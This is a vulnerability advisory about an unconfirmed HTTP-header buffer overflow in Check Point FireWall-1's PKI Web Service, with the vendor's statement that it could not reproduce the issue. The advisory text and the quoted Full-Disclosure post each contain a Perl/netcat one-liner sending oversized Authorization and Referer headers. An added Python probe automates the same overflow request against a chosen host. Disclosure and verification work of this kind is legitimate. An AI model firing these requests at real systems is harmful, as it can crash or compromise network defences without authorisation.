[Unconfirmed] Check Point FireWall-1 Buffer Overflow in PKI Web Service Has Unspecified Impact
SecurityTracker Alert ID: 1021948
SecurityTracker URL: http://securitytracker.com/id/1021948
CVE Reference: CVE-2009-1227
Updated: Apr 10 2009
Original Entry Date: Mar 30 2009
Impact: Not specified
Exploit Included: Yes
Description:
A vulnerability was reported in FireWall-1/VPN-1 in the PKI Web Service. The impact was not specified. [Editor's note: This vulnerability is unconfirmed.]
A remote user can reportedly send an overlong 'Authorization' or 'Referer' HTTP header value to the PKI Web Service on TCP port 18264 (the port named in the report and used by the demonstration exploit) to trigger a buffer overflow.
A demonstration exploit [Perl command] request is provided. It must be entered as a single shell command; line breaks are allowed only between the concatenated string pieces, never inside a quoted header value. 'suckit.com' stands for the target host:
perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
  "\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006 09:12:58 GMT" .
  "\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
  "\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc suckit.com 18264
BugsNotHugs reported this vulnerability.
The vendor has provided the following response:
"Check Point Security Alert Team has analyzed this report. We've tried to reproduce the attack on all VPN-1 versions from NG FP2 and above with and without HFAs.
The issue was not reproduced. We have conducted a thorough analysis of the relevant code and verified that we are secure against this attack.
We consider this attack to pose no risk to Check Point customers."
[Editor's note: The original reporter stands by the report and indicates that the behavior was observed during a penetration test two years ago against an unknown version of the product. Note that the NG FP2 product was released in April 2002.]
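Because the report is unconfirmed and the vendor could not reproduce it, the useful next step for anyone with access to an affected-looking installation is a controlled reproduction rather than the bare one-liner. The following probe is an added example; it is neither the advisory's nor the poster's code. It builds the same request the PoC sends, with the two header lengths as parameters, and brackets it with a short baseline request so that a non-answering service can be distinguished from one that stopped answering after the long headers. The target host 'target.example' is a placeholder; the port is the one the report names. Note that the posted PoC puts no space between 'Basic' and the filler and names the header 'UserAgent'; the builder keeps both quirks by default (exact_poc=True) so the bytes on the wire match the report, and emits the standard forms when exact_poc=False.

```python
import socket
import sys

# Added reproduction probe for the report above (not the advisory's or the
# poster's code). target.example is a placeholder host; the port is the one
# the report names.
PKI_PORT = 18264


def build_request(auth_len, referer_len, path="/", exact_poc=True):
    """Return HTTP/1.0 request bytes with auth_len filler bytes appended to
    the Authorization value and referer_len filler bytes appended to the
    Referer value (the PoC uses 8192 for both). exact_poc=True reproduces
    the PoC's "Basic<filler>" and "UserAgent" quirks."""
    auth_prefix = "Basic" if exact_poc else "Basic "
    ua_name = "UserAgent" if exact_poc else "User-Agent"
    lines = [
        f"GET {path} HTTP/1.0",
        "Authorization: " + auth_prefix + "x" * auth_len,
        "From: bugs@hugs.com",
        "If-Modified-Since: Fri, 13 Dec 2006 09:12:58 GMT",
        "Referer: http://www.owasp.org/" + "x" * referer_len,
        f"{ua_name}: FsckResponsibleDisclosure 1.0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def header_value(request, name):
    """Return the value of header `name` from request bytes, or None.
    Lets you check what the builder emits before anything is sent."""
    head = request.split(b"\r\n\r\n", 1)[0].decode("ascii")
    for line in head.split("\r\n")[1:]:
        key, _, value = line.partition(": ")
        if key.lower() == name.lower():
            return value
    return None


def send_and_read(host, port, data, timeout=5.0):
    """Send data and collect the reply until the peer closes or the read
    times out. Returns (reply_bytes, error_or_None)."""
    chunks = []
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(data)
            while True:
                buf = s.recv(4096)
                if not buf:
                    break
                chunks.append(buf)
    except socket.timeout:
        pass  # HTTP/1.0 peers normally close; if not, keep what arrived
    except OSError as exc:
        return b"".join(chunks), str(exc)
    return b"".join(chunks), None


def probe(host, port=PKI_PORT, auth_len=8192, referer_len=8192):
    """Baseline request, long-header request, baseline again.
    A service that answers the baseline before but not after the long
    request, or that resets the long request mid-send, is worth a closer
    look; a host that never answers the baseline says nothing about the
    report."""
    baseline = build_request(0, 0)
    before, err_before = send_and_read(host, port, baseline)
    _, err_long = send_and_read(host, port, build_request(auth_len, referer_len))
    after, err_after = send_and_read(host, port, baseline)
    return {
        "alive_before": err_before is None and len(before) > 0,
        "long_request_error": err_long,
        "alive_after": err_after is None and len(after) > 0,
    }


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "target.example"
    print(probe(target))
```

Run it as `python probe.py <host>` against a host you are authorised to test. Keep the baseline check: the vendor's statement covers NG FP2 and later, so a result is only meaningful alongside the exact product version, which the original reporter could not obtain.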
Impact:
The impact was not specified.
Solution:
[Editor's note: The vendor has tested versions NG FP2 and later, with and without HFAs, and cannot reproduce the reported behavior; its analysis of the relevant code in those versions indicates the product is not affected, so no fix has been issued. See the Description section for the vendor's response.]
Vendor URL: www.checkpoint.com/

Cause:
Boundary error

Underlying OS:
Message History:
None.
Source Message Contents
Date: Mon, 30 Mar 2009 02:16:17 -0600
Subject: [Full-disclosure] Check Point Firewall-1 PKI Web Service HTTP
- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow
- Description
The Check Point Firewall-1 PKI Web Service, running by default on TCP
port 18264, is vulnerable to a remote overflow in the handling of very
long HTTP headers. This was discovered during a pen-test where the
client would not allow further analysis and would not provide the full
product/version info. Initial testing indicates the 'Authorization'
and 'Referer' headers were vulnerable.
- Product
Check Point, Firewall-1, unknown
- PoC
perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
  "\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006 09:12:58 GMT" .
  "\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
  "\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc suckit.com 18264
- Solution
None
- Timeline
2006-11-06: Vulnerability Discovered
2009-03-29: Disclosed to Public
--
BugsNotHugs
Shared Vulnerability Disclosure Account
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/